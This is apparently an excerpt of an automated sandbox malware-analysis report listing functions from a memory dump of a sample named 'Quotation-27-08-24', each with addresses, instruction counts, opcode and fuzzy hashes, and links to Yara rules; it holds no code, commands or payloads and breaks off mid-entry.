                                          • Instruction ID: f0ba9489a210026af5c8671e5b2c48dcbfc939a3e436597e1fa7c5be3440ee04
                                          • Opcode Fuzzy Hash: b66e08d2e428dfa314b04fba972a4a6a21851cbd6f28c6f29dc36446b34ed2a5
                                          • Instruction Fuzzy Hash: 8BF0BB727047015FE764A5159C01B623295D7D0B72F298075EF068B2D3E975DC05A7D4
                                          Function 00F9656A Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee35cdc148a4434b7f73787027fa24b084e36a507655b18ce2044a2707af806f
                                          • Instruction ID: c30b625e5e976d346812f0a3caaa5d25c1237b760ec65960a2a4f1746b10af4b
                                          • Opcode Fuzzy Hash: ee35cdc148a4434b7f73787027fa24b084e36a507655b18ce2044a2707af806f
                                          • Instruction Fuzzy Hash: C001A4B16007C49BF736AB2CCD49B2533A9AB40B50F5D4191B905CBAD6D77CE801B621
                                          Function 0100437C Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction ID: e8fe7076b4189623606f0ec5b633af417e94bc0c1e6fa6e1a3338f935a2b4531
                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction Fuzzy Hash: 0DF0E935341D1347FBB7AA2D9860B2EB7D6AF80E00F05A56CA7C5DB6C0DF50D8008784
                                          Function 00FEC89D Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9b4586326714b11d47195b52ebd502cfc0effdec3095efecb449a4e500a0701
                                          • Instruction ID: bb93ac86479bcaa0f117f38d960e0de8c7101ec970dcc135e391ef6d15a0544f
                                          • Opcode Fuzzy Hash: b9b4586326714b11d47195b52ebd502cfc0effdec3095efecb449a4e500a0701
                                          • Instruction Fuzzy Hash: 87F0C2B16057449FC310EF29CD42E1FB7E4EF88710F40865AB898DB391EA38EA01D796
                                          Function 00FEE872 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction ID: 2674d31b404c26d98b18e4f01229c14a541a8ea96f91458f2c7199c65befa3da
                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                          • Instruction Fuzzy Hash: 6DF0E233B41691ABD3318E4AEC80F12B3A8EFD5B70F290025B508AB260C360ED01E7D0
                                          Function 00F90854 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction ID: 4a7aca0209cc8b24af009cc0761a026d6584fc1e3f1ec1c1740e827433d9dedb
                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                          • Instruction Fuzzy Hash: 5DF0B472610204AFE714DB21CC01F56B2E9EF98750F1484789945D72A0FAB4DE01E694
                                          Function 00FEC912 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cc2e3ea33fdab801f44f3da13b14144ec375303931695c2169a717793f6164
                                          • Instruction ID: 4c3faecf0b9b8d8e36c0b013346f965444179db5f537499cbade87ff85faf934
                                          • Opcode Fuzzy Hash: 11cc2e3ea33fdab801f44f3da13b14144ec375303931695c2169a717793f6164
                                          • Instruction Fuzzy Hash: E7F062B0A0124DEFCB14EF69C515E5EB7B4EF48300F108056B859EB386DA78EB01DBA1
                                          Function 00F647FB Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c09db9da2da8ce73c118bf172fe40dd45f1e471b5b2206eec9497ee09f1fef4f
                                          • Instruction ID: 0f5d60982d39920fce3fe78dd1ef792b56cc1cb9344145ebc034fb9aa2f08a49
                                          • Opcode Fuzzy Hash: c09db9da2da8ce73c118bf172fe40dd45f1e471b5b2206eec9497ee09f1fef4f
                                          • Instruction Fuzzy Hash: 2AF0BE32D166E0DFD733EBB8C444BA1B7D8AB10730F1C896AD49987502CB68FC84E651
                                          Function 01020115 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2464d2fb1bda64cad9741ccec41f1b96da60de9efe3991ec8a97a889564873f6
                                          • Instruction ID: f4e89f1b8901d5f25259b52c4342b62c8dd8cdceae5c1967a238d2053339b881
                                          • Opcode Fuzzy Hash: 2464d2fb1bda64cad9741ccec41f1b96da60de9efe3991ec8a97a889564873f6
                                          • Instruction Fuzzy Hash: 2CF05C774157D506CFB26B3CB8603D26FB8A741110F6914C9E8E05720DC67F8483C320
                                          Function 00F9C5ED Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 684724820b940e8d3f5e502ee78a569cc9cb13974567e8df50b46cec7fa29e1a
                                          • Instruction ID: 63291a9043e5a8699666a92450d7bb601ee1c978e386dab11b1bc6532567a360
                                          • Opcode Fuzzy Hash: 684724820b940e8d3f5e502ee78a569cc9cb13974567e8df50b46cec7fa29e1a
                                          • Instruction Fuzzy Hash: 04F0E2729116509FEB329758C148B5177D8AB40BB0F189526E40EC7552C364CC80EAD1
                                          Function 00FA2619 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: e13b3b865f6fe39d6ae816403251be772e2464b44046a4785a8d56b3557030ee
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 91E0D872301A002BD7119E59CCC1F47776EEFC7B10F044479B5045F252C9E6DD0996A4
                                          Function 00FF6030 Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction ID: 7304c8cf74223dfa8f75a940a80a8efc2f2ed51cc8e2357336224e1a6e8aa56d
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: 08F030725046089FE3208F05DD84F62B7E8EB05764F65C026E709DB561DB7AEC40EBA4
                                          Function 00F60710 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: 0fb4c3994a1644751551baf762ff877331f0069c47a72affe0cb1af1905c603c
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: 31F0ED7A204354ABDB19DF16D040AE67BA8EB51360F204095E8468B341EB35FD82EF81
                                          Function 00F949D0 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: c9416b00b335d04e08679a235f889e6ef482fd3142651d05880de8e048e794d6
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: E7E09233684546ABEB211E558C01F6677A59BE67B0F150429E1049B150DB7CEC42FB98
                                          Function 0100678E Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction ID: 0d5b72f3fdb91601a620e955c89907c3317056627774e2e9062c62a7bf8373c9
                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction Fuzzy Hash: A3E0DF32A00110BBEB2297998D02F9ABEEDEB94FA0F050059B604E70D0E571EE00D690
                                          Function 00F625E0 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bf56ce753b22123de4221bfe0483ecd5149aa9bb836d41a2e52be80d9fe6dfa8
                                          • Instruction ID: f74607cb4c19fe71f5bfc7536d880fee9807a1372d695be41a7d489cd23407d4
                                          • Opcode Fuzzy Hash: bf56ce753b22123de4221bfe0483ecd5149aa9bb836d41a2e52be80d9fe6dfa8
                                          • Instruction Fuzzy Hash: A9E09272100A54ABC722BB29DD02F8B779AEB94364F014515B15557191CB39A910D794
                                          Function 0101A456 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction ID: 47e0d9bc8804ab9b5906da31fdf01ea0abb3a4e4de32c2b4fd031a6035d38fa4
                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                          • Instruction Fuzzy Hash: BAE09231151650DFE7766F29DC49B927BE0BF80711F148C6DB1DA124B1CB7C98C0EA40
                                          Function 00FE4000 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction ID: f2e46887fbf03e644f2de210b52c62ae200854d71ad8e216bb50ba56dfd4e626
                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction Fuzzy Hash: 9BE0AE347002458BD715CF1AC040B6277A6BFD5B20F28C079AA488F205EB32A8429A40
                                          Function 00F9CA38 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae88b1dcea51e75435da71fa96fdc46032cd73ad7bb515af7d44c43f91369be4
                                          • Instruction ID: 6b78e6b4a015cf14a89f41f9ab5324747f6ce7356589e33de05adcf180c4325c
                                          • Opcode Fuzzy Hash: ae88b1dcea51e75435da71fa96fdc46032cd73ad7bb515af7d44c43f91369be4
                                          • Instruction Fuzzy Hash: 42D02B328814606ADF74F114BC14FD73A59AB55770F014861F10CD2010D55DCC81F3C4
                                          Function 00F5823B Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction ID: cf8e559043f3d38fc257fed2e0402df67fbb9ac3cd5fb77d5f742a9aca5d4b35
                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction Fuzzy Hash: 20E0CD32504910EFD7312F16DC01F517BA5FF94BA1F204819F545264758B745C86FF55
                                          Function 00F62050 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42c51baa0c59d1b861344ffc1878f8a6c8154c6ea3850854240e9d11888cbd12
                                          • Instruction ID: 61d7cf7b2c25814fe7573e65c180d2766cb1997b440f17a8626a3c3c153715fe
                                          • Opcode Fuzzy Hash: 42c51baa0c59d1b861344ffc1878f8a6c8154c6ea3850854240e9d11888cbd12
                                          • Instruction Fuzzy Hash: FDE08C321005506BC712FA6DED42E4A739AEB94360F004221B155972D1CA29AD00D794
                                          Function 00F98A90 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                          • Instruction ID: 2b857a4dd2e4904d8682c696ad5fe31b87784a24990be8a2fa7fad5225f10da6
                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                          • Instruction Fuzzy Hash: BBE08633511A149BC728DE18D512B7277A4EF45770F19463EA51347780C934E944D794
                                          Function 00FB6AA4 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                          • Instruction ID: b7add205d9bc6a3f1f4c2053dfd3d919940b65a61f25ce34a296f79d1daed671
                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                          • Instruction Fuzzy Hash: EBD05E36511A50AFC7329F1BEE00C53BBF9FBC4B20705062FA54593920C674AC06EBA0
                                          Function 00F9E59C Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction ID: aa4e3285b7e839076d6d42409a7267a0c852c66830b151aa19360750b5b8ab80
                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction Fuzzy Hash: 08D0A7325045106BD7329A1CFC00FC333D9AB58721F05045AB008C7150C364AC41D644
                                          Function 00FDE908 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction ID: 26188d3ff4ee8e0aba4bc2c5640dbf58b4aec4428c9086ea65b2b1c56fc72a65
                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction Fuzzy Hash: 84E0EC36951684AFDF12EF69DA50F5AB7F5BB84B50F590054A0086F661C628AD00EB81
                                          Function 00F5A0E3 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction ID: cb8a2266c7079424d02e688729459597e1140ae69f27abe1bdc417d712c68055
                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction Fuzzy Hash: 83D02233226030A3CB2956606C00F637945AB80BA1F1A012D390AA3800C0088C53F6E2
                                          Function 00F9A830 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction ID: 8112403b69a287ade34f369b58328165431506b43a7cb4c95d0b00885bc4ff14
                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction Fuzzy Hash: 3DD012371D054CBBDB129F65DC02F957BA9E754BA0F448021B508875A1C63AE950E585
                                          Function 00F9CA24 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c225057435a1f257602a18012b8bbf0fae96298e8fda4ac0419205ca89f6f80
                                          • Instruction ID: c1fd4990cf2154effa90b5b2225e60e0ef17302aaca96a185882d0a86b6fde5b
                                          • Opcode Fuzzy Hash: 2c225057435a1f257602a18012b8bbf0fae96298e8fda4ac0419205ca89f6f80
                                          • Instruction Fuzzy Hash: 0BD0A731901106DBEF16CF14CD20E2E36B1EF14780B440069E60051120E72DDC02F650
                                          Function 00F9C700 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction ID: 2a34c697fe597771f3dda6f93701f5bc73ecdea12814a5c59a1b4b4100c8c874
                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction Fuzzy Hash: F8C01232150644AFD7129A94DD01F0177A9E798B40F004021F20447571C535E910E645
                                          Function 00F80310 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: 2c5c7e182d99489719896a10b60f35a0dfd02ac404c81cfbd16be914115219f3
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: 2DD01236100248EFCB02EF41D890D9A772AFBC8710F508019FD19076118A35ED62DB50
                                          Function 00F60750 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction ID: 208b87d795fb3ef5deab2f0b945a8b38affc679a4ee9a4d54a24c15c8497edf5
                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction Fuzzy Hash: CCC04C757015458FCF15DB1AD694F8577E4F744750F154890E809CB721E724ED01EA11
                                          Function 00FA4340 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e579f9af8685e3cb0d9eed6f006caab90cf276bb377e0af9927b19bdc37c161
                                          • Instruction ID: a3b092f1f1f6fb2e285e1380d52766e3aaeb291a4bcff1f6bdedc6f8129d8438
                                          • Opcode Fuzzy Hash: 3e579f9af8685e3cb0d9eed6f006caab90cf276bb377e0af9927b19bdc37c161
                                          • Instruction Fuzzy Hash: 0190023160580022924071598C84586400D97E0341B55C022E0425594D8E188A57AB61
                                          Function 00FA4650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 360b36cad9dfdbc9d2a3786a3260b43581c83c7b52cdfe0a0b197ccacb082531
                                          • Instruction ID: 3f86d215a448e75283293af1d2e0ca1a164b541e7b63f1aa911b9df31875c43e
                                          • Opcode Fuzzy Hash: 360b36cad9dfdbc9d2a3786a3260b43581c83c7b52cdfe0a0b197ccacb082531
                                          • Instruction Fuzzy Hash: 3290026160150052424071598C04446600D97E1341395C126A05555A0D8A1C8956EA69
                                          Function 00FA2AF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
